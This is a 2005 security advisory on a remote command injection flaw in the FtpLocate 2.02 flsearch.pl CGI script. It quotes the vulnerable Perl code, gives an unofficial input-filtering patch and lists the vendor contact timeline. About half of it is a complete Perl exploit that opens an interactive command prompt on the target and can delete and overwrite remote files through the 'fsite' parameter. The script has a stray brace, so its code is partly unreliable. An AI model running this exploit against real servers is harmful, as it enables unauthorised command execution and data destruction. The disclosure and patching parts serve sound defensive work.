flsearch.pl.txt

`Chroot Security Group Advisory 2005-07-25  
  
Remote arbitrary code execution in FtpLocate 2.02 (current)  
  
Summary:  
FtpLocate is a ftp search engine supporting filename and description search.  
A remote attack can run arbitary commands with the web server's privileges by  
exploiting a unfiltered parameter in flsearch.pl.  
  
Details:  
FtpLocate contains a vulnerability that can allow an attacker to execute  
arbitrary commands. The vulnerability is due to improper input validation of  
user-supplied parameters (fsite) by the flsearch.pl script. Remote attackers can run arbitary commands with the web servers's privieges by adding a "|" or ";".  
  
Vuln. Systems:  
FtpLocate 1.5 - 2.02   
  
Vuln. Code:  
---   
/ftplocate-2.02/bin/flsearch.pl :  
# line 23 - 60  
$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);  
...   
if ( $fsite eq "" ) {  
...  
} else {  
$resultfname=$query_raw."-$fsite";  
...  
}  
...  
open (L, "$CACHEDIR/$resultfname"); # Game Over 1  
---  
/ftplocate-2.02/bin/flsearch.pl:  
# line 53  
do_flsearch($client, $query, $fsite, $resultfname);  
  
/ftplocate-2.02/bin/flmodule.pl:  
# line 526 – 537   
if ( $fsite eq "" ) {  
...  
} else {  
$optf="-F '$fsite'"; # for glimpse  
...  
}  
# line 537  
open(G, "$CMD_GLIMPSE -i -Ny $optf $optw -H $FILELISTDIR -e '$q' 2>/$TMPDIR/flsearch.tmp.$$|"); # Game Over 2  
---  
/ftplocate-2.02/bin/flmodule.pl:  
# line 584  
`$CMD_AGREP -i -e '$q' $setlist_str /dev/null>'$CACHEDIR/$resultfname'`; # Game Over 3  
---  
/ftplocate-2.02/bin/flmodule.pl:  
# line 589  
`$CMD_AGREP -i -e '$q' $setlist_str /dev/null>'$CACHEDIR/$resultfname'`; # Game Over 4  
---  
  
Unofficial Patch:  
diff -urN flsearch.pl.orig flsearch.pl  
--- flsearch.pl.orig 2005-07-22 17:48:52.502670968 +0800  
+++ flsearch.pl 2005-07-22 17:56:00.979532584 +0800  
@@ -20,7 +20,10 @@  
$starttime=gettimeofday(); $starttimestr=timestr();  
  
$query=clean_str($input{'query'}); $query_raw=CGI::escape($query); -$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);  
+$fsite=clean_str($input{'fsite'});  
+# dangerous characters  
+$fsite =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;  
+$fsite_raw=CGI::escape($fsite); $page=$input{'page'};  
$client=ip2fqdn(client_ip());  
  
  
Vendor Response: 2005.07.15 Vendor notified via email.  
2005.07.19 Vendor notified via email, again.  
2005.07.25 No response. Advisory released.  
  
Exploit Code:  
#!/usr/bin/perl  
#  
# FtpLocate <= 2.02 (current) remote exploit  
# VERY PRIVATE VERSION  
# DO NOT DISTRIBUTE  
#  
# newbug Tseng [at] chroot.org  
#  
  
sub my_socket  
{   
my $s=IO::Socket::INET->new(PeerAddr => $host,  
PeerPort => 80,  
Proto => "tcp") or die "socket: ";  
}  
sub ch2hex  
{   
$chr = $_[0];  
$out="";  
for($i=0;$i<length($chr);$i++)  
{  
$ch = substr($chr,$i,1);  
  
if($ch eq "\"")  
{  
$out.="%5c%22";  
}  
  
elsif($ch eq "\$")  
{  
$out.="%5c%24";  
}  
elsif($ch eq "\@")  
{   
$out.="%5c%40";  
}  
else  
{  
$out.="%".sprintf("%2.2x",ord($ch));  
}  
}  
$out;  
}  
sub upload_file  
{   
print "local file: ";  
chomp($lfile = <STDIN>);  
print "remote file: ";  
chomp($rfile = <STDIN>);  
  
my $socket = &my_socket($host);  
print $socket "GET $cgi?query=xx\&fsite=|rm%20-f%20$rfile| $junk";  
close $socket;  
print "remove $host:$rfile done.\n";  
  
my @DATA = `cat $lfile`;  
$num=1;  
$total = scalar @DATA;  
foreach $DATA (@DATA)  
{   
$DATA = &ch2hex($DATA);  
my $socket = &my_socket($host);  
print $socket "GET $cgi?query=xx\&fsite=|echo%20\"$DATA\"%20>>$rfile| $junk";  
print "Send lfile \"$lfile\" to $host:$rfile ... ($num/$total)\n";   
sleep(1);  
close $socket;  
$num++;  
}  
}   
use IO::Socket::INET;   
  
print "FtpLocate flsearch.pl remote exploit\n";  
print "host: ";  
chomp ($host = <STDIN>);  
print "port (80): ";  
chomp ($port = <STDIN>);  
if($port eq "")   
{   
$port = 80;  
}   
print "version 1.0/1.1 (1.0): ";  
chomp ($ver = <STDIN>);  
if($ver eq "")  
{   
$ver = "1.0";  
}  
print "cmd/upload (cmd): "; chomp ($opt = <STDIN>);  
if($opt eq "") {   
$opt = "cmd";  
}  
print "cgi path (/cgi-bin/ftplocate/flsearch.pl): ";  
chomp ($cgi = <STDIN>);  
if($cgi eq "")  
{   
$cgi = "/cgi-bin/ftplocate/flsearch.pl";  
}  
if($ver eq "1.0")  
{   
$junk = "HTTP/1.0\n\n";  
}  
}  
else  
{  
$junk = "HTTP/1.1\nHost: $host\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624 Netscape/7.1\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\nAccept-Language: zh-tw,en-us;q=0.7,en;q=0.3\nAccept-Encoding: gzip,deflate\nAccept-Charset: Big5,utf-8;q=0.7,*;q=0.7\nKeep-Alive: 300\nConnection: keep-alive\n\n"; }   
if($opt eq "cmd")   
{  
while(1){  
print "h4ck3r\@[$host]:~\$ ";  
chomp ($cmd = <STDIN>);  
if($cmd ne "")  
{  
print "Send command \"$cmd\" to $host ...\n";  
$socket = &my_socket($host);  
$cmd =~ s/\s/%20/g;  
  
print $socket "GET $cgi?query=xx\&fsite=|$cmd| $junk";  
print "done.\n";  
}  
}  
}  
elsif($opt eq "upload")  
{   
&upload_file($lfile);  
}  
print "done.\n";  
`